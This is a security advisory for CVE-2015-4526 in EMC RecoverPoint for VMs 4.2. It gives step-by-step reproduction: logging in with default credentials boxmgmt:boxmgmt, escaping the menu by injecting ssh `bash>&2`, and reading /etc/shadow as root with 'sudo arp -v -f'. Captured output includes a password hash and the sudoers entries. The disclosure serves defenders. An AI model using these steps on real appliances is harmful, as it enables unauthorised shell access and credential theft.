SSD Advisory – EMC RecoverPoint for Virtual Machines (VMs) Restriction Bypass

Vulnerability Description
RecoverPoint’s virtual appliance can be accessible via SSH with the default credentials of boxmgmt:boxmgmt; during testing, no password change option was found. Using these credentials, it’s possible to escape the management interface via command injection to drop into a shell and further take advantage of sudo privileged operations to read arbitrary files as root. It also may also be possible to execute arbitrary os commands as root, but this was not confirmed.

Analysis / Reproduction
Bug #1: Escape-to-Shell

$ ssh boxmgmt@emc-vrpa
Password: [boxmgmt]
Initializing Installation Manager... done
Installation Manager - RecoverPoint Version 4.2(mercury.92) Cluster vrpa RPA 1
** Main Menu **
[1] Installation
[2] Setup
<strong>[3] Diagnostics</strong>
[…]
vrpa RPA 1: 3
** Diagnostics **
[…]
<strong>[5] Run internal command</strong>
[M] Main Menu
[B] Back
[Q] Quit
vrpa RPA 1: 5
[…]
Enter internal command: ssh `bash>&2`
boxmgmt@RecoverPoint-0x7c037c1d8ca0d2bd-RPA1:~$ uname –a;id
Linux RecoverPoint-0x7c037c1d8ca0d2bd-RPA1 3.0.56-k3 #11 SMP Tue May 21 13:50:27 IDT 2013 x86_64 GNU/Linux
uid=562(boxmgmt) gid=562(boxmgmt) groups=562(boxmgmt)

Bug #2: Arbitrary File Read with Root Privileges
/bin/run_boxmgmt (the management interface) calls the Java core UI which is written located on the box here:
/home/kos/kashya/archive/classes/com.kashya.recoverpoint.installation.client.jar
After extracting the JAR and decompiling the RunInternalCmdUIStep.class file, we can see there are several commands which will run with root privileges via sudo:

public class RunInternalCmdUIStep
[…]
    allowedCmds.put("arp", Boolean.TRUE);
    allowedCmds.put("arping", Boolean.TRUE);
    allowedCmds.put("date", Boolean.FALSE);
    allowedCmds.put("ethtool", Boolean.TRUE);
    allowedCmds.put("kps.pl", Boolean.TRUE);
[...]
try
    {
      PrintStream ps = new PrintStream("/tmp/internal_cmd");
      if (((Boolean)allowedCmds.get(cmdName)).booleanValue()) {
        ps.print("sudo ");
      }
      ps.print(internalCmd);
      ps.close();
    }

run_boxmgmt then reads the contents of /tmp/internal_cmd and executes command for the caller.
emc_image_1
For example, we see boxmgmt can execute the ‘arp’ binary with sudo. arp can be given a file to read and using the verbose flag, will spit out its contents upon error. So, if we wanted to read any file as root, we could leverage arp like this:

boxmgmt@RecoverPoint-0x7c037c1d8ca0d2bd-RPA1:~$ sudo arp -v -f /etc/shadow
>> root:$1$Hy6MAnOy$tlHmRGo2lO4jzlcM42Uto0:13933:0:99999:7:::
arp: format error on line 1 of etherfile /etc/shadow !
>> daemon:*:16040:0:99999:7:::
[...]

We can use this bug to gain further insight by reading the /etc/sudoers file:

root          ALL = (ALL) ALL
[…]
boxmgmt       ALL = NOPASSWD: /home/kos/kbox/src/installation/Installation/scripts/run_collect_kbox_info.sh
boxmgmt       ALL = NOPASSWD: /usr/bin/ssh
boxmgmt       ALL = NOPASSWD: /usr/sbin/ethtool
boxmgmt       ALL = NOPASSWD: /usr/sbin/arp
boxmgmt       ALL = NOPASSWD: /usr/bin/arping
boxmgmt       ALL = NOPASSWD: /usr/bin/kps.pl

If any of these other binaries or scripts could be further leveraged into executing arbitrary commands (instead of just reading files), dropping into a root shell would be trivial.
Vulnerable Version
EMC RecoverPoint for VMs version 4.2
CVE
A single CVE has been assigned for this vulnerability CVE-2015-4526.
Vendor Response
The vendor has issued an advisory, http://seclists.org/bugtraq/2015/Jul/att-59/ESA-2015-115.txt